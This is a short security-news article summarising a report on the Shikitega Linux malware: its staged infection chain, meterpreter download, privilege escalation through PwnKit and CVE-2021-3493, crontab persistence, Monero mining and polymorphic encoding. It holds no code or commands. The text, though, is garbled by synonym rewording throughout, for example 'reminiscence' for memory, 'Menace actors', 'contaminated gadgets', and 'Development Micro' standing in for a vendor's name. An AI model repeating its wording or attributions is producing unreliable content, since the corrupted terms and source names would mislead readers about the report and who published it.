A brand new piece of stealthy Linux malware known as Shikitega has been uncovered adopting a multi-stage an infection chain to compromise endpoints and IoT gadgets and deposit further payloads.
“An attacker can acquire full management of the system, along with the cryptocurrency miner that might be executed and set to persist,” AT&T Alien Labs stated in a brand new report printed Tuesday.
As soon as deployed on a focused host, the assault chain downloads and executes the Metasploit’s “Mettle” meterpreter to maximise management, exploits vulnerabilities to raise its privileges, provides persistence on the host through crontab, and finally launches a cryptocurrency miner on contaminated gadgets.
The precise technique by which the preliminary compromise is achieved stays unknown as but, however what makes Shikitega evasive is its capability to obtain next-stage payloads from a command-and-control (C2) server and execute them straight in reminiscence.
Privilege escalation is achieved by the use of exploiting CVE-2021-4034 (aka PwnKit) and CVE-2021-3493, enabling the adversary to abuse the elevated permissions to fetch and execute the ultimate stage shell scripts with root privileges to ascertain persistence and deploy the Monero crypto miner.
In an additional try and fly beneath the radar, the malware operators make use of a “Shikata ga nai” polymorphic encoder to make it harder to detect by antivirus engines and abuse legit cloud companies for C2 capabilities.
Shikitega can also be indicative of a pattern towards malicious actors increasing their assault attain to accommodate the Linux working system that is extensively utilized in cloud platforms and servers internationally, contributing to a surge in LockBit and Cheerscrypt ransomware infections.
In accordance with Development Micro 2022 Midyear Cybersecurity Report, “the emergence of those new Linux ransomware households straight corresponds to […] a 75% improve in ransomware assaults focusing on Linux techniques within the first half of 2022 in comparison with the primary half of 2021.”
“Menace actors proceed to seek for methods to ship malware in new methods to remain beneath the radar and keep away from detection,” AT&T Alien Labs researcher Ofer Caspi stated.
“Shiketega malware is delivered in a complicated method, it makes use of a polymorphic encoder, and it regularly delivers its payload the place every step reveals solely a part of the overall payload.”